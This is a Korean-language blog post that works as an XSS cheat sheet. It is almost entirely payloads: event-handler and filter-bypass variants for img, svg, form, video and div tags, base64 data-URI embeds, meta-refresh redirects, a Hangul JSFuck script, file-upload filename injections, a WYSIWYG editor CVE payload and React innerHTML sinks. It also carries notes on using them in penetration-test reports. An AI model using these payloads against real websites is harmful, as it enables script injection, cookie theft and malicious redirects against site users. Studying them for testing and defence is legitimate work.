- form 태그
<form onformdata="alert(1)"><button>Click</button></form>
<!—!><h1 value=”—><a href=”javascript:alert(document.document.)”>testing</a>
- img onerror에 다양한 우회
< img src=x onerror=alert(1)> 이게 오리지날이라면
<img/src=x onerror=alert(1)>
<img/src=”x”onerror/alert(1)> 띄어쓰기가 안될때 이런방식도 있음
<img\nsrc=”x”onerror/alert(1)>
<img/src/onerror=alert(1)>
[보고서 쓸때 xss 유형 ]
<script>alert('xss test')</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
window.open('https://hsi.xxx.kr')
<script>console.log("xsstest"+" "+window.origin)</script>
javascript: confirm `1`
alert(window.location.hostname)
// 실행 위치가 자바스크립트 단이면
location.href="https://hsi..kr";
confirm `1`
---------------------------------------------------------------------------
<embed type="text/html" src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoJ3hzc190ZXN0XzIwMjQwNzE4Jyk+IA=="> //svg onload 로 alert띄우기 base64로 인코딩
<embed type="text/html" src=""> // pdf 다운로드 링크 삽입 해서 자동으로 다운받게 하기
<object data="https://hsi..kr" width="400" height="300"></object>
<iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe> //img 에서 onerror 로 alert
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a>
1"><input onbeforeinput=alert(1)>
1"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](2)>
<link rel="import" href="data:x <script>alert(1)</script>
e
<svg><script xlink:href=data;,alert(1)></script>
<form onformdata="alert(document.domain)"><button>Click</button></form>
### page가 시작되면 xss
<body onpageshow=alert(1)>
#### svg 애니메이트 xss
<svg><animate onbegin=alert(1) attributeName=x dur=1s> //onbegin 속성외 나머지 속성 없어도 됨
<svg><animate onend=alert(1) attributeName=x dur=1s> // 이거는 svg 애니메이트가 끝나면 터지는 거라 dur 속성 있어야함
#### css 실행하면 xss 터지게
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
##### 리다이렉트
<meta content="10;url=https://hsi..kr" http-equiv="refresh" />
<meta content='10;url=https://hsi..kr' http-equiv='refresh' />
<meta content="5;url=javascript:alert(1)" http-equiv="refresh" />
#######파일 업로드
""><svg onload=alert(document.domain)>.jpg"
""><svg onload=prompt(document.domain)>.jpg"
#######jsfuck을 이용한 한글 페이로드
<meta charset="utf-8">
<script>
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)
[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
</script>
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
######url
?footbar=<foo%20bar=%250a%20onclick=alert(1)>
#####검색창에 시도 해볼만한거
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
#####WYSIWYG 에디터 (CVE-2024-37629)
<details/open/ontoggle=prompt(origin)>
//#### Basic payload
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
//#### Img payload
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=\u0061\u006C\u0065\u0072\u0074(document.domain)>
">%20<img src=o onerror=alert``>//
//#### Svg payload
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) /> (`Firefox` is the only browser which allows self closing script)
//#### html5
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
//###### 모바일에 쓰면 좋은 xss
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
//#### Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
[[[[[ XML ]]]]]]
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
[[[dangerouslySetInnerhtml ]]]] 리액트 관련 xss로 ckeditor 이 해당 에디터 이용한다면 주목
const markup= {__html:'<img src=x onerror=alert(1)>'};
return <div dangerouslySetInnerHTML={markup} />;
const name = "<img src='x' onerror='alert(1)'>";
el.innerHTML = name; // shows the alert
참조
https://hackr.io/blog/xss-cheat-sheet
트위터 계정: @XssPayloads
반응형
'보안 > 기초' 카테고리의 다른 글
| burpsuite을 이용해 파일업로드취약점 확장자 명 우회 취약점 / burpsuite 문제점 (1) | 2024.01.27 |
|---|---|
| time base sql injection (0) | 2024.01.14 |
| blind SQL injection (1) | 2024.01.14 |
| Error based SQL injection (0) | 2024.01.13 |
| TCP vs UDP (0) | 2023.11.14 |
